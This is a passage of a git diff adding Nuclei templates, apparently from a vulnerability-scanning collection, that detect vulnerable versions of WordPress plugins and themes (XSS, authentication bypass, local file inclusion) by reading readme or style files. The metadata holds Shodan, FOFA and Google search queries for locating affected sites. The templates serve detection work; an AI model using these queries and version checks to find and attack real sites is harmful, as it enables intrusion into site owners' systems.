+ NewsMunch <= 1.0.35 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The NewsMunch theme for WordPress is vulnerable to Stored Cross-Site Scripting via a malicious display name in all versions up to, and including, 1.0.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1a2b0ff4-9471-4fd0-ac1a-ed5b7b4af4ff?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10848
+ metadata:
+ fofa-query: "wp-content/themes/newsmunch/"
+ google-query: inurl:"/wp-content/themes/newsmunch/"
+ shodan-query: 'vuln:CVE-2024-10848'
+ tags: cve,wordpress,wp-theme,newsmunch,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/newsmunch/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "newsmunch"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.35')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10849-c4f62162d556d3b337dc88f33abf0608.yaml b/poc/cve/CVE-2024-10849-c4f62162d556d3b337dc88f33abf0608.yaml
new file mode 100644
index 0000000000..86e70fcd78
--- /dev/null
+++ b/poc/cve/CVE-2024-10849-c4f62162d556d3b337dc88f33abf0608.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10849-c4f62162d556d3b337dc88f33abf0608
+
+info:
+ name: >
+ NewsMash <= 1.0.71 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The NewsMash theme for WordPress is vulnerable to Stored Cross-Site Scripting via a malicious display name in all versions up to, and including, 1.0.71 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bb30dac-e0f3-43dd-a20d-9af6c7af3cb4?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10849
+ metadata:
+ fofa-query: "wp-content/themes/newsmash/"
+ google-query: inurl:"/wp-content/themes/newsmash/"
+ shodan-query: 'vuln:CVE-2024-10849'
+ tags: cve,wordpress,wp-theme,newsmash,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/newsmash/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "newsmash"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.71')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml b/poc/cve/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml
new file mode 100644
index 0000000000..44f464f0ce
--- /dev/null
+++ b/poc/cve/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e
+
+info:
+ name: >
+ Quotes llama <= 3.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Quotes llama plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'quotes-llama' shortcode in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e2f3abd-0a15-4bc1-966a-22d606f3e333?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10874
+ metadata:
+ fofa-query: "wp-content/plugins/quotes-llama/"
+ google-query: inurl:"/wp-content/plugins/quotes-llama/"
+ shodan-query: 'vuln:CVE-2024-10874'
+ tags: cve,wordpress,wp-plugin,quotes-llama,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/quotes-llama/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "quotes-llama"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10879-fdafc38df20050c33f2864a1f7138f44.yaml b/poc/cve/CVE-2024-10879-fdafc38df20050c33f2864a1f7138f44.yaml
new file mode 100644
index 0000000000..b90e223913
--- /dev/null
+++ b/poc/cve/CVE-2024-10879-fdafc38df20050c33f2864a1f7138f44.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10879-fdafc38df20050c33f2864a1f7138f44
+
+info:
+ name: >
+ ForumWP – Forum & Discussion Board <= 2.1.2 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The ForumWP – Forum & Discussion Board plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/10b3256b-5271-44b8-ab4d-05156d4f674b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-10879
+ metadata:
+ fofa-query: "wp-content/plugins/forumwp/"
+ google-query: inurl:"/wp-content/plugins/forumwp/"
+ shodan-query: 'vuln:CVE-2024-10879'
+ tags: cve,wordpress,wp-plugin,forumwp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/forumwp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "forumwp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10881.yaml b/poc/cve/CVE-2024-10881.yaml
new file mode 100644
index 0000000000..4562f976ea
--- /dev/null
+++ b/poc/cve/CVE-2024-10881.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10881
+
+info:
+ name: >
+ LUNA RADIO PLAYER <= 6.24.11.07 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The LUNA RADIO PLAYER plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'lunaradio' shortcode in versions up to, and including, 6.24.11.07 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ed8a7f8-1af3-4b41-bfaf-fd1c35baa867?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10881
+ metadata:
+ fofa-query: "wp-content/plugins/lu-radioplayer/"
+ google-query: inurl:"/wp-content/plugins/lu-radioplayer/"
+ shodan-query: 'vuln:CVE-2024-10881'
+ tags: cve,wordpress,wp-plugin,lu-radioplayer,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lu-radioplayer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lu-radioplayer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.24.11.07')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10909-308c66fb506ba01c372d73eaeb9b223a.yaml b/poc/cve/CVE-2024-10909-308c66fb506ba01c372d73eaeb9b223a.yaml
new file mode 100644
index 0000000000..290d988de5
--- /dev/null
+++ b/poc/cve/CVE-2024-10909-308c66fb506ba01c372d73eaeb9b223a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10909-308c66fb506ba01c372d73eaeb9b223a
+
+info:
+ name: >
+ Pojo Forms <= 1.4.7 - Authenticated (Subscriber+) Arbitrary Shortcode Execution via form_preview_shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The The Pojo Forms plugin for WordPress is vulnerable to arbitrary shortcode execution via form_preview_shortcode AJAX action in all versions up to, and including, 1.4.7. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. This was partially fixed in version 1.4.8.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/511ce6f6-aea3-4c37-8312-d6e5ff2fdf6f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 6.3
+ cve-id: CVE-2024-10909
+ metadata:
+ fofa-query: "wp-content/plugins/pojo-forms/"
+ google-query: inurl:"/wp-content/plugins/pojo-forms/"
+ shodan-query: 'vuln:CVE-2024-10909'
+ tags: cve,wordpress,wp-plugin,pojo-forms,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pojo-forms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pojo-forms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10937.yaml b/poc/cve/CVE-2024-10937.yaml
new file mode 100644
index 0000000000..39f06ec706
--- /dev/null
+++ b/poc/cve/CVE-2024-10937.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10937
+
+info:
+ name: >
+ Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins <= 2.0.58 - Sensitive Information Exposure
+ author: topscoder
+ severity: medium
+ description: >
+ The Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.58 via the wp_ajax_nopriv_related_post_ajax_get_post_ids AJAX action. This makes it possible for unauthenticated attackers to extract sensitive data including titles of posts in draft status.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/85f7c69d-0b48-47af-9451-3cfd4326ffe5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-10937
+ metadata:
+ fofa-query: "wp-content/plugins/related-post/"
+ google-query: inurl:"/wp-content/plugins/related-post/"
+ shodan-query: 'vuln:CVE-2024-10937'
+ tags: cve,wordpress,wp-plugin,related-post,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/related-post/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "related-post"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.58')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10961-60fb90d65f9868b90bab1ea437eb89b3.yaml b/poc/cve/CVE-2024-10961-60fb90d65f9868b90bab1ea437eb89b3.yaml
new file mode 100644
index 0000000000..640498730a
--- /dev/null
+++ b/poc/cve/CVE-2024-10961-60fb90d65f9868b90bab1ea437eb89b3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10961-60fb90d65f9868b90bab1ea437eb89b3
+
+info:
+ name: >
+ Social Login <= 5.9.0 - Authentication Bypass
+ author: topscoder
+ severity: critical
+ description: >
+ The Social Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.9.0. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/43a64074-ca64-4c34-b467-06d1ad8c5aa0?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-10961
+ metadata:
+ fofa-query: "wp-content/plugins/oa-social-login/"
+ google-query: inurl:"/wp-content/plugins/oa-social-login/"
+ shodan-query: 'vuln:CVE-2024-10961'
+ tags: cve,wordpress,wp-plugin,oa-social-login,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/oa-social-login/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "oa-social-login"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.9.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml b/poc/cve/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml
new file mode 100644
index 0000000000..8a3dda0de2
--- /dev/null
+++ b/poc/cve/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db
+
+info:
+ name: >
+ Login With OTP <= 1.4.2 - Authentication Bypass via Weak OTP
+ author: topscoder
+ severity: critical
+ description: >
+ The Login With OTP plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.4.2. This is due to the plugin generating too weak OTP, and there’s no attempt or time limit. This makes it possible for unauthenticated attackers to generate and brute force the 6-digit numeric OTP that makes it possible to log in as any existing user on the site, such as an administrator, if they have access to the email.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3775d48-5985-475e-8fb9-c4c5fd044772?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-11178
+ metadata:
+ fofa-query: "wp-content/plugins/otp-login/"
+ google-query: inurl:"/wp-content/plugins/otp-login/"
+ shodan-query: 'vuln:CVE-2024-11178'
+ tags: cve,wordpress,wp-plugin,otp-login,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/otp-login/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "otp-login"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml b/poc/cve/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml
new file mode 100644
index 0000000000..4f40bc9c2f
--- /dev/null
+++ b/poc/cve/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19
+
+info:
+ name: >
+ myCred – Loyalty Points and Rewards plugin <= 2.7.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via mycred_send Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The myCred – Loyalty Points and Rewards plugin for WordPress and WooCommerce – Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mycred_send shortcode in all versions up to, and including, 2.7.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11201
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:CVE-2024-11201'
+ tags: cve,wordpress,wp-plugin,mycred,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.5.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11204-f87aa22c9bcd426fec72b8003f96482e.yaml b/poc/cve/CVE-2024-11204-f87aa22c9bcd426fec72b8003f96482e.yaml
new file mode 100644
index 0000000000..b1dea3a88b
--- /dev/null
+++ b/poc/cve/CVE-2024-11204-f87aa22c9bcd426fec72b8003f96482e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11204-f87aa22c9bcd426fec72b8003f96482e
+
+info:
+ name: >
+ ForumWP – Forum & Discussion Board <= 2.1.2 - Reflected Cross-Site Scripting via url Parameter
+ author: topscoder
+ severity: medium
+ description: >
+ The ForumWP – Forum & Discussion Board plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘url’ parameter in all versions up to, and including, 2.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd11abe3-8307-492b-beef-242fb21a4206?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11204
+ metadata:
+ fofa-query: "wp-content/plugins/forumwp/"
+ google-query: inurl:"/wp-content/plugins/forumwp/"
+ shodan-query: 'vuln:CVE-2024-11204'
+ tags: cve,wordpress,wp-plugin,forumwp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/forumwp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "forumwp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11276-1c24f81d5eab39f4ec1228eaffb6a4d3.yaml b/poc/cve/CVE-2024-11276-1c24f81d5eab39f4ec1228eaffb6a4d3.yaml
new file mode 100644
index 0000000000..52b63e4768
--- /dev/null
+++ b/poc/cve/CVE-2024-11276-1c24f81d5eab39f4ec1228eaffb6a4d3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11276-1c24f81d5eab39f4ec1228eaffb6a4d3
+
+info:
+ name: >
+ PDF Builder for WooCommerce. Create invoices,packing slips and more <= 1.2.136 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The PDF Builder for WooCommerce. Create invoices,packing slips and more plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.2.136 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5f21a86b-52f4-4563-afce-32f1949ce5a1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11276
+ metadata:
+ fofa-query: "wp-content/plugins/woo-pdf-invoice-builder/"
+ google-query: inurl:"/wp-content/plugins/woo-pdf-invoice-builder/"
+ shodan-query: 'vuln:CVE-2024-11276'
+ tags: cve,wordpress,wp-plugin,woo-pdf-invoice-builder,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woo-pdf-invoice-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woo-pdf-invoice-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.136')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11289-4184d5eaa04495a4f6cb218a2896f8eb.yaml b/poc/cve/CVE-2024-11289-4184d5eaa04495a4f6cb218a2896f8eb.yaml
new file mode 100644
index 0000000000..7de10ea86d
--- /dev/null
+++ b/poc/cve/CVE-2024-11289-4184d5eaa04495a4f6cb218a2896f8eb.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11289-4184d5eaa04495a4f6cb218a2896f8eb
+
+info:
+ name: >
+ Soledad <= 8.5.9 - Unauthenticated Limited Local File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+ The Soledad theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 8.5.9 via several functions like penci_archive_more_post_ajax_func, penci_more_post_ajax_func, and penci_more_featured_post_ajax_func. This makes it possible for unauthenticated attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included. The exploitability of this is limited to Windows.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/927674db-05f1-4f3b-8297-8a907955ea87?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-11289
+ metadata:
+ fofa-query: "wp-content/themes/soledad/"
+ google-query: inurl:"/wp-content/themes/soledad/"
+ shodan-query: 'vuln:CVE-2024-11289'
+ tags: cve,wordpress,wp-theme,soledad,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/soledad/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "soledad"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 8.5.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11292-850b0e5aa453cf8d597f2fe778aca46b.yaml b/poc/cve/CVE-2024-11292-850b0e5aa453cf8d597f2fe778aca46b.yaml
new file mode 100644
index 0000000000..4590abad1d
--- /dev/null
+++ b/poc/cve/CVE-2024-11292-850b0e5aa453cf8d597f2fe778aca46b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11292-850b0e5aa453cf8d597f2fe778aca46b
+
+info:
+ name: >
+ WP Private Content Plus <= 3.6.1 - Unauthenticated Content Restriction Bypass to Sensitive Information Exposure
+ author: topscoder
+ severity: medium
+ description: >
+ The WP Private Content Plus plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.1 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/30c46b91-e371-480f-943a-3906d8b6bbba?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-11292
+ metadata:
+ fofa-query: "wp-content/plugins/wp-private-content-plus/"
+ google-query: inurl:"/wp-content/plugins/wp-private-content-plus/"
+ shodan-query: 'vuln:CVE-2024-11292'
+ tags: cve,wordpress,wp-plugin,wp-private-content-plus,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-private-content-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-private-content-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.1')
\ No newline at end of file
